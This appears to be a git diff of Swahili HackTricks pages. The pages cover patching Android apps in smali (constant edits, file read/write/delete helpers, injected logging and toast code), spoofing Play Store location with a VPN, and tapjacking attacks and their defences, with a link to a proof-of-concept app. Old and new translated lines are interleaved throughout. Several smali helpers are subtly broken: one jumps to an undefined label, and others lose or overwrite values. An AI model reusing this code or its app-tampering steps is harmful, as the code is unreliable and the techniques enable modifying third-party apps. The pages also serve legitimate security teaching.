The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
### Mabadiliko Mepesi
### Mabadiliko ya Mwanga
### Badilisha thamani za awali za kivinjari ndani ya kazi
### Badilisha thamani za awali za kigezo ndani ya kazi
Baadhi ya kivinjari hutajwa mwanzoni mwa kazi kwa kutumia opcode _const_, unaweza kubadilisha thamani zake, au unaweza kutaja mpya:
Baadhi ya vigezo vinafafanuliwa mwanzoni mwa kazi kwa kutumia opcode _const_, unaweza kubadilisha thamani zake, au unaweza kufafanua mpya:
```bash
#Number
const v9, 0xf4240
@ -116,466 +117,6 @@ const/4 v8, 0x1
const-string v5, "wins"
```
### Operesheni za Msingi
#### Kusoma na Kuandika Faili
Kusoma faili:
```smali
.method public static readTextFile(Ljava/lang/String;)Ljava/lang/String;
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
new-instance v1, Ljava/io/BufferedReader;
new-instance v2, Ljava/io/FileReader;
invoke-direct {v2, v0}, Ljava/io/FileReader;-><init>(Ljava/io/File;)V
invoke-direct {v1, v2}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
.line 3
const/4 v2, 0x0
:cond_0
:goto_0
invoke-virtual {v1}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
move-result-object v0
if-eqz v0, :cond_1
.line 4
new-instance v2, Ljava/lang/StringBuilder;
invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
.line 5
invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
.line 3
goto :goto_0
.line 7
:cond_1
invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
.line 8
invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v0
.line 9
return-object v0
.end method
```
Kuandika faili:
```smali
.method public static writeTextFile(Ljava/lang/String;Ljava/lang/String;)V
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.param p1, "content" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
new-instance v1, Ljava/io/BufferedWriter;
new-instance v2, Ljava/io/FileWriter;
invoke-direct {v2, v0}, Ljava/io/FileWriter;-><init>(Ljava/io/File;)V
invoke-direct {v1, v2}, Ljava/io/BufferedWriter;-><init>(Ljava/io/Writer;)V
.line 3
invoke-virtual {v1, p1}, Ljava/io/BufferedWriter;->write(Ljava/lang/String;)V
.line 4
invoke-virtual {v1}, Ljava/io/BufferedWriter;->close()V
.line 5
return-void
.end method
```
#### Kufuta Faili
```smali
.method public static deleteFile(Ljava/lang/String;)Z
.locals 2
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->delete()Z
move-result v1
.line 3
return v1
.end method
```
#### Kupata Ukubwa wa Faili
```smali
.method public static getFileSize(Ljava/lang/String;)J
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->length()J
move-result-wide v1
.line 3
return-wide v1
.end method
```
#### Kupata Tarehe ya Mwisho ya Kubadilishwa kwa Faili
```smali
.method public static getLastModified(Ljava/lang/String;)J
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->lastModified()J
move-result-wide v1
.line 3
return-wide v1
.end method
```
#### Kupata Orodha ya Faili na Vichwa vya Habari
```smali
.method public static getFiles(Ljava/lang/String;)[Ljava/lang/String;
.locals 4
.param p0, "dirPath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->listFiles()[Ljava/io/File;
move-result-object v1
.line 3
array-length v2, v1
new-array v3, v2, [Ljava/lang/String;
.line 4
const/4 v2, 0x0
:goto_0
if-ge v2, v3, :cond_0
aget-object v0, v1, v2
invoke-virtual {v0}, Ljava/io/File;->getName()Ljava/lang/String;
move-result-object v0
aput-object v0, v3, v2
.line 3
add-int/lit8 v2, v2, 0x1
goto :goto_0
.line 6
:cond_0
return-object v3
.end method
```
#### Kupata Orodha ya Vichwa vya Habari vya Faili
```smali
.method public static getHeaders(Ljava/lang/String;)[Ljava/lang/String;
.locals 4
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
new-instance v1, Ljava/io/BufferedReader;
new-instance v2, Ljava/io/FileReader;
invoke-direct {v2, v0}, Ljava/io/FileReader;-><init>(Ljava/io/File;)V
invoke-direct {v1, v2}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
.line 3
new-instance v2, Ljava/util/ArrayList;
invoke-direct {v2}, Ljava/util/ArrayList;-><init>()V
.line 4
:cond_0
:goto_0
invoke-virtual {v1}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
move-result-object v0
if-eqz v0, :cond_1
.line 5
invoke-virtual {v2, v0}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
goto :goto_0
.line 7
:cond_1
invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
.line 8
invoke-virtual {v2}, Ljava/util/ArrayList;->toArray()[Ljava/lang/Object;
move-result-object v0
check-cast v0, [Ljava/lang/String;
.line 9
return-object v0
.end method
```
#### Kupata Aina ya Faili
```smali
.method public static getFileType(Ljava/lang/String;)Ljava/lang/String;
.locals 2
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->getName()Ljava/lang/String;
move-result-object v0
.line 3
const/4 v1, 0x2e
invoke-virtual {v0, v1}, Ljava/lang/String;->lastIndexOf(I)I
move-result v1
.line 4
if-lez v1, :cond_0
.line 5
invoke-virtual {v0, v1}, Ljava/lang/String;->substring(I)Ljava/lang/String;
move-result-object v0
.line 6
return-object v0
.line 8
:cond_0
const-string v0, ""
goto :goto_0
.end method
```
#### Kupata Uendeshaji wa Faili
```smali
.method public static getFilePermissions(Ljava/lang/String;)Ljava/lang/String;
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->canRead()Z
move-result v1
.line 3
invoke-virtual {v0}, Ljava/io/File;->canWrite()Z
move-result v2
.line 4
new-instance v0, Ljava/lang/StringBuilder;
invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
.line 5
const-string v3, "Read: "
invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
.line 6
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
.line 7
const-string v1, ", Write: "
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
.line 8
invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
.line 9
invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v0
.line 10
return-object v0
.end method
```
#### Kupata Muda wa Kuundwa kwa Faili
```smali
.method public static getCreationTime(Ljava/lang/String;)J
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->lastModified()J
move-result-wide v1
.line 3
return-wide v1
.end method
```
#### Kupata Orodha ya Vichwa vya Habari vya Faili ya ZIP
```smali
.method public static getZipFileHeaders(Ljava/lang/String;)[Ljava/lang/String;
.locals 4
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/util/zip/ZipFile;
invoke-direct {v0, p0}, Ljava/util/zip/ZipFile;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/util/zip/ZipFile;->entries()Ljava/util/Enumeration;
move-result-object v1
.line 3
new-instance v2, Ljava/util/ArrayList;
invoke-direct {v2}, Ljava/util/ArrayList;-><init>()V
.line 4
:cond_0
:goto_0
invoke-interface {v1}, Ljava/util/Enumeration;->hasMoreElements()Z
move-result v3
if-eqz v3, :cond_1
.line 5
invoke-interface {v1}, Ljava/util/Enumeration;->nextElement()Ljava/lang/Object;
move-result-object v0
check-cast v0, Ljava/util/zip/ZipEntry;
.line 6
invoke-virtual {v0}, Ljava/util/zip/ZipEntry;->getName()Ljava/lang/String;
move-result-object v0
.line 7
invoke-virtual {v2, v0}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
goto :goto_0
.line 9
:cond_1
invoke-virtual {v2}, Ljava/util/ArrayList;->toArray()[Ljava/lang/Object;
move-result-object v0
check-cast v0, [Ljava/lang/String;
.line 10
return-object v0
.end method
```
```bash
#Math
add-int/lit8 v0, v2, 0x1 #v2 + 0x1 and save it in v0
@ -600,7 +141,7 @@ goto :goto_6 #Always go to: :goto_6
```
### Mabadiliko Makubwa
### Kurekodi (Logging)
### Kurekodi
```bash
#Log win: <number>
iget v5, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Get this.o inside v5
@ -609,19 +150,19 @@ move-result-object v1 #Move to v1
const-string v5, "wins" #Save "win" inside v5
invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I #Logging "Wins: <num>"
```
Mapendekezo:
Recommendations:
* Ikiwa utatumia pembejeo zilizotangazwa ndani ya kazi (zilizotangazwa v0, v1, v2...), weka mistari hii kati ya _.local \<number>_ na tangazo la pembejeo (_const v0, 0x1_)
* Ikiwa unataka kuweka kificho cha kuingiza katikati ya kificho cha kazi:
* Ongeza 2 kwenye idadi ya pembejeo zilizotangazwa: Mfano: kutoka _.locals 10_ hadi _.locals 12_
* Pembejeo mpya inapaswa kuwa nambari inayofuata ya pembejeo zilizotangazwa tayari (katika mfano huu itakuwa _v10_ na _v11_, kumbuka kuwa inaanza na v0).
* Badilisha kificho cha kazi ya kuingiza na tumia _v10_ na _v11_ badala ya _v5_ na _v1_.
* Ikiwa unatumia mabadiliko yaliyotangazwa ndani ya kazi (iliyotangazwa v0,v1,v2...) weka mistari hii kati ya _.local \<number>_ na matangazo ya mabadiliko (_const v0, 0x1_)
* Ikiwa unataka kuweka msimbo wa logging katikati ya msimbo wa kazi:
* Ongeza 2 kwa idadi ya mabadiliko yaliyotangazwa: Mfano: kutoka _.locals 10_ hadi _.locals 12_
* Mabadiliko mapya yanapaswa kuwa nambari zinazofuata za mabadiliko yaliyotangazwa tayari (katika mfano huu yanapaswa kuwa _v10_ na _v11_, kumbuka kwamba inaanza katika v0).
* Badilisha msimbo wa kazi ya logging na utumie _v10_ na _v11_ badala ya _v5_ na _v1_.
### Kutoa taarifa
### Toasting
Kumbuka kuongeza 3 kwenye idadi ya _.locals_ mwanzoni mwa kazi.
Kumbuka kuongeza 3 kwa idadi ya _.locals_ mwanzoni mwa kazi.
Kificho hiki kimeandaliwa ili kiingizwe katika **katikati ya kazi** (**badilisha** idadi ya **pembejeo** kama inavyohitajika). Itachukua **thamani ya this.o**, **itabadilisha** kuwa **String** na kisha **kutoa taarifa** na thamani yake.
Msimbo huu umeandaliwa kuingizwa katika **katikati ya kazi** (**badilisha** nambari ya **mabadiliko** kama inavyohitajika). Itachukua **thamani ya this.o**, **kubadilisha** kuwa **String** na kisha **kutengeneza** **toast** na thamani yake.
```bash
const/4 v10, 0x1
const/4 v11, 0x1
@ -633,16 +174,17 @@ invoke-static {p0, v11, v12}, Landroid/widget/Toast;->makeText(Landroid/content/
move-result-object v12
invoke-virtual {v12}, Landroid/widget/Toast;->show()V
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

66
mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
View file

@ -1,57 +1,59 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Katika hali ambapo programu inazuiliwa kwa nchi fulani, na huwezi kuweka kwenye kifaa chako cha Android kutokana na vizuizi vya kikanda, kudanganya eneo lako kwenda nchi ambapo programu inapatikana kunaweza kukupa ufikiaji. Hatua zifuatazo zinaelezea jinsi ya kufanya hivyo:
Katika hali ambapo programu imewekwa vizuizi kwa nchi fulani, na huwezi kuisakinisha kwenye kifaa chako cha Android kutokana na vizuizi vya kikanda, kubadilisha eneo lako kuwa nchi ambapo programu hiyo inapatikana kunaweza kukupa ufikiaji. Hatua zilizo hapa chini zinaelezea jinsi ya kufanya hivyo:
1. **Sakinisha Hotspot Shield Free VPN Proxy:**
- Anza kwa kupakua na kusakinisha Hotspot Shield Free VPN Proxy kutoka Duka la Google Play.
- Anza kwa kupakua na kusakinisha Hotspot Shield Free VPN Proxy kutoka Google Play Store.
2. **unganisha kwenye Seva ya VPN:**
2. **Unganisha kwenye Server ya VPN:**
- Fungua programu ya Hotspot Shield.
- Unganisha kwenye seva ya VPN kwa kuchagua nchi ambapo programu unayotaka kufikia inapatikana.
- Unganisha kwenye server ya VPN kwa kuchagua nchi ambapo programu unayotaka kufikia inapatikana.
3. **Futa Data ya Duka la Google Play:**
3. **Futa Data za Google Play Store:**
- Nenda kwenye **Mipangilio** ya kifaa chako.
- Endelea kwenye **Programu** au **Meneja wa Programu** (hii inaweza kutofautiana kulingana na kifaa chako).
- Tafuta na chagua **Duka la Google Play** kutoka kwenye orodha ya programu.
- Bonyeza **Lazimisha Kusitisha** kumaliza mchakato wowote unaofanya kazi wa programu.
- Kisha bonyeza **Futa Data** au **Futa Uhifadhi** (maneno sahihi yanaweza kutofautiana) ili kurejesha programu ya Duka la Google Play kwenye hali yake ya awali.
- Tafuta na uchague **Google Play Store** kutoka kwenye orodha ya programu.
- Gusa **Lazimisha Kusitisha** ili kumaliza mchakato wowote unaoendelea wa programu hiyo.
- Kisha gusa **Futa Data** au **Futa Hifadhi** (maneno halisi yanaweza kutofautiana) ili kurejesha programu ya Google Play Store kwenye hali yake ya awali.
4. **Fikia Programu Iliyozuiwa:**
- Fungua **Duka la Google Play**.
- Sasa duka litakuonyesha yaliyomo ya nchi uliyounganishwa nayo kupitia VPN.
- Unapaswa kuweza kutafuta na kuweka programu ambayo awali haikuwa inapatikana katika eneo lako halisi.
4. **Fikia Programu Iliyowekwa Vizuizi:**
- Fungua **Google Play Store**.
- Duka sasa linapaswa kuonyesha maudhui ya nchi uliyounganishwa nayo kupitia VPN.
- Unapaswa kuwa na uwezo wa kutafuta na kusakinisha programu ambayo hapo awali haikupatikana katika eneo lako halisi.
### Vidokezo muhimu:
- Ufanisi wa njia hii unaweza kutofautiana kulingana na mambo kadhaa ikiwa ni pamoja na uaminifu wa huduma ya VPN na vizuizi maalum vya kikanda vilivyowekwa na programu.
- Matumizi ya kawaida ya VPN yanaweza kuathiri utendaji wa baadhi ya programu na huduma.
- Jua sheria za matumizi ya programu au huduma yoyote unayotumia, kwani matumizi ya VPN kwa kudukua vizuizi vya kikanda kunaweza kukiuka sheria hizo.
### Maelezo Muhimu:
- Ufanisi wa njia hii unaweza kutofautiana kulingana na mambo kadhaa ikiwa ni pamoja na uaminifu wa huduma ya VPN na vizuizi vya kikanda vilivyowekwa na programu.
- Kutumia VPN mara kwa mara kunaweza kuathiri utendaji wa programu na huduma zingine.
- Kuwa makini na masharti ya huduma ya programu au huduma yoyote unayotumia, kwani kutumia VPN kupita vizuizi vya kikanda kunaweza kukiuka masharti hayo.
## Marejeo
* [https://manifestsecurity.com/android-application-security-part-23/](https://manifestsecurity.com/android-application-security-part-23/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

74
mobile-pentesting/android-app-pentesting/tapjacking.md
View file

@ -1,47 +1,48 @@
# Tapjacking
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## **Maelezo Msingi**
## **Basic Information**
**Tapjacking** ni shambulio ambapo **programu mbaya** inazinduliwa na **kujipanga juu ya programu ya mwathiriwa**. Mara tu inapofunika programu ya mwathiriwa, kiolesura chake cha mtumiaji kimeundwa kwa njia ambayo inadanganya mtumiaji kuingiliana nacho, wakati inapitisha uingiliano kwa programu ya mwathiriwa.\
Kimsingi, inamfanya mtumiaji **ashindwe kujua kwamba wanafanya vitendo kwenye programu ya mwathiriwa**.
**Tapjacking** ni shambulio ambapo **programu** **mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoifunika kwa wazi programu ya mwathirika, kiolesura chake cha mtumiaji kimeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano huo kwa programu ya mwathirika.\
Kwa hivyo, inafanya **mtumiaji kuwa kipofu kwa kujua kwamba kwa kweli wanatekeleza vitendo kwenye programu ya mwathirika**.
### Uchunguzi
### Detection
Ili kugundua programu zinazoweza kushambuliwa na hili, unapaswa kutafuta **shughuli zilizotolewa** kwenye mwongozo wa android (kumbuka kwamba shughuli na intent-filter zinazotolewa kwa chaguo-msingi). Mara baada ya kupata shughuli zilizotolewa, **angalia kama zinahitaji idhini yoyote**. Hii ni kwa sababu **programu mbaya itahitaji idhini hiyo pia**.
Ili kugundua programu zinazoweza kuathiriwa na shambulio hili unapaswa kutafuta **shughuli zilizotolewa** katika android manifest (kumbuka kwamba shughuli yenye intent-filter inasafirishwa kiotomatiki kwa default). Mara umepata shughuli zilizotolewa, **angalia kama zinahitaji ruhusa yoyote**. Hii ni kwa sababu **programu mbaya itahitaji ruhusa hiyo pia**.
### Kinga
### Protection
#### Android 12 (API 31,32) na zaidi
#### Android 12 (API 31,32) na juu
[**Kulingana na chanzo hiki**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** mashambulio ya tapjacking yanazuiliwa moja kwa moja na Android kutoka Android 12 (API 31 & 30) na zaidi. Kwa hivyo, hata kama programu inaweza kuwa na kasoro hutaweza **kuitumia**.
[**Kulingana na chanzo hiki**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** mashambulizi ya tapjacking yanazuia kiotomatiki na Android kuanzia Android 12 (API 31 & 30) na juu. Hivyo, hata kama programu ina udhaifu huwezi **kuweza kuitumia**.
#### `filterTouchesWhenObscured`
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`kweli`**, `View` haitapokea kugusa wakati dirisha la maoni linapofunikwa na dirisha lingine linaloonekana.
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`true`**, `View` haitapokea kugusa wakati dirisha la mtazamo linapofunikwa na dirisha lingine linaloonekana.
#### **`setFilterTouchesWhenObscured`**
Sifa **`setFilterTouchesWhenObscured`** ikiwekwa kuwa kweli inaweza pia kuzuia kutumia kasoro hii ikiwa toleo la Android ni la chini.\
Ikiwekwa kuwa **`kweli`**, kwa mfano, kitufe kinaweza **kulemazwa moja kwa moja ikiwa kimefunikwa**:
Sifa **`setFilterTouchesWhenObscured`** iliyowekwa kuwa kweli pia inaweza kuzuia matumizi ya udhaifu huu ikiwa toleo la Android ni la chini.\
Ikiwa imewekwa kuwa **`true`**, kwa mfano, kitufe kinaweza kuondolewa kiotomatiki **ikiwa kimefunikwa**:
```xml
<Button android:text="Button"
android:id="@+id/button1"
@ -50,46 +51,47 @@ android:layout_height="wrap_content"
android:filterTouchesWhenObscured="true">
</Button>
```
## Utekaji
## Utekelezaji
### Tapjacking-ExportedActivity
**Programu ya hivi karibuni ya Android** inayotekeleza shambulio la Tapjacking (+ kuita kabla ya shughuli iliyotolewa ya programu iliyoshambuliwa) inaweza kupatikana hapa: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity).
Programu ya **Android ya hivi karibuni** inayofanya shambulio la Tapjacking (+ kuanzisha kabla ya shughuli iliyosafirishwa ya programu iliyoathiriwa) inaweza kupatikana katika: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity).
Fuata **maagizo ya README** ili kuitumia.
Fuata **maagizo ya README ili kuitumia**.
### FloatingWindowApp
